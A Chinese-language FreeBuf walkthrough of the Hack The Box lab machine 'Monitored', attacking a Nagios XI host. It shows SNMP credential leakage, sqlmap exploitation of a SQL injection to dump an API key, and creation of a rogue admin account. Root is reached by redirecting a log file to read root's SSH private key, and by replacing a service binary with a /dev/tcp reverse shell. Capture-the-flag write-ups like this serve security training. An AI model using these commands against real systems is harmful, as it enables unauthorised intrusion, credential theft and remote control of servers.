freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines][Medium]Monitored
  • 关注
[Meachines][Medium]Monitored
2024-04-29 00:27:06

Main

$ nmap -p- -sC -sV 10.10.11.248 --min-rate 1000

image.png

# echo "10.10.11.248 nagios.monitored.htb" >>/etc/hosts

image.png

image.png

image.png

  • Nagios 是一个流行的开源网络监控系统,用于监控计算机系统、网络设备、服务以及应用程序。它可以实时监控主机和服务的状态,及时发现和报告问题,从而帮助管理员快速诊断和解决网络和系统方面的故障。

通过漏洞库查询到存在一个SQL注入
CVE-2023–40933

image.png

image.png

image.png

$ nmap -sU -sC -sV 10.10.11.248 --min-rate 1000

image.png

  • SNMP(Simple Network Management Protocol)是一种用于管理和监控网络设备的标准协议。它允许网络管理员远程监视网络设备的运行状态、收集性能数据、配置设备以及诊断问题。通过SNMP,管理员可以从网络设备(如路由器、交换机、服务器等)中获取信息,也可以向这些设备发送控制命令。SNMP使用一个基于文本的数据格式来交换信息,通常被用于监控和管理大型企业网络。

$ snmpwalk -v2c -c public nagios.monitored.htb
从结果中发现了了登录凭据svc XjH7VCehowpR1xZB

image.png

  • snmpbulkwalk 是一个基于命令行的工具,用于执行 SNMP(Simple Network Management Protocol)的批量查询。它通常用于获取大量的网络设备信息,比如路由器、交换机等。与标准的 snmpwalk 工具相比,snmpbulkwalk 通过在单个请求中获取多个变量来提高效率,减少了网络交互的次数,因此对于大型网络或者需要获取大量信息的情况下更加高效。snmpbulkwalk 工具允许用户指定要查询的设备、OID(Object Identifier)以及相关的认证参数,以便获取所需的网络设备信息

https://nagios.monitored.htb/nagiosxi/includes/components/ccm/index.php

image.png

https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php

image.png

页面存在

$ curl -X POST -k -L -d 'username=svc&password=XjH7VCehowpR1xZB' https://nagios.monitored.htb/nagiosxi/api/v1/authenticate/

我们可以通过这个接口来获取TOKEN

image.png

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch --dbs

image.png

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --tables

image.png

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump

image.png

我们将通过这个APIKEY来添加一个用户

$ curl -XPOST 'https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1' -d 'username=s-h4ck13&password=maptnh&email=maptnh@maptnh.com&name=mapth&auth_level=admin' -k
image.png

登录后台https://nagios.monitored.htb/nagiosxi/login.php
如果是真实环境在这里其实可在SQL数据库中修改管理员的邮箱,让后忘记密码,这样发送的重置密码就会到攻击者邮箱验证修改
username:s-h4ck13
password:maptnh

image.png

Configure->Core Config Manager->Commands->Add New

image.png

image.png

image.png

选择命令后,点击右下角Run Check Command

image.png

image.png

image.png

User Flag

/home/nagios$ cat user.txt

image.png

39ea0ded58be8ba1cf84a3f332e5757e

Root Flag

$ sudo -l

image.png

方法1

$ cat /usr/local/nagiosxi/scripts/components/getprofile.sh

我们将内容复制下来分析

image.png

在277行发现一个文件我们有权限进行修改

image.png

image.png

$ cat /usr/local/nagios/etc/nagios.cfg

image.png

$ vi /usr/local/nagios/etc/nagios.cfg
把log_file=/usr/local/nagios/var/nagios.log修改成log_file=/root/.ssh/id_rsa

image.png

$ sudo /usr/local/nagiosxi/scripts/components/getprofile.sh 1

image.png

[靶机]

$ cd /usr/local/nagiosxi/var/components
$ /usr/local/nagiosxi/var/components$ python -m http.server 7890

[Kali]

$ wget http://10.10.11.248:7890/profile.zip
$ unzip profile.zip
目录profile-1714316974/nagios-logs/nagios.txt已经读取到root用户的私钥
image.png

$ cd profile-1714316974/nagios-logs;mv nagios.txt id_rsa;chmod 400 id_rsa;ssh -i id_rsa root@10.10.11.248

image.png

4c45fe55bd0f2f1364c07760c92af9d8

方法2

[靶机]

$ ls /usr/local/nagiosxi/scripts/ -la

image.png

$ cd /usr/local/nagiosxi/scripts/

$ cat manage_services.sh

用于操作服务的

image.png

我们可以控制启动npcd服务来反弹一个shell

  • npcd 是 Nagios XI 中的一个守护进程(daemon),用于执行网络设备的自动发现和监控。Nagios 是一个流行的开源网络监控工具,Nagios XI 是 Nagios 的商业版本,提供了更多功能和易用性。

image.png

$ systemctl status npcd

找到服务位置

image.png

$ sudo ./manage_services.sh stop npcd

$ systemctl status npcd

image.png

$ rm /usr/local/nagios/bin/npcd

我们可以手动删除这个npcd,

image.png

我们可以看之前的权限,我们所在组是具有高权限的,可以进行删除该文件

image.png

$ vi /usr/local/nagios/bin/npcd
劫持该服务

#!/bin/bash
 bash -i >& /dev/tcp/10.10.16.23/10034 0>&1

$ chmod +x /usr/local/nagios/bin/npcd

方法2-1

$ sudo ./manage_services.sh start npcd

image.png

image.png

4c45fe55bd0f2f1364c07760c92af9d8

方法2-2

值得庆幸的是在/usr/local/nagiosxi/scripts/components/getprofile.sh调用了这个可执行文件

image.png

$ sudo /usr/local/nagiosxi/scripts/components/getprofile.sh 1

image.png

image.png

4c45fe55bd0f2f1364c07760c92af9d8

# 黑客 # 网络安全 # web安全 # 数据安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录
方法1
    方法2
    • 方法2-1
    • 方法2-2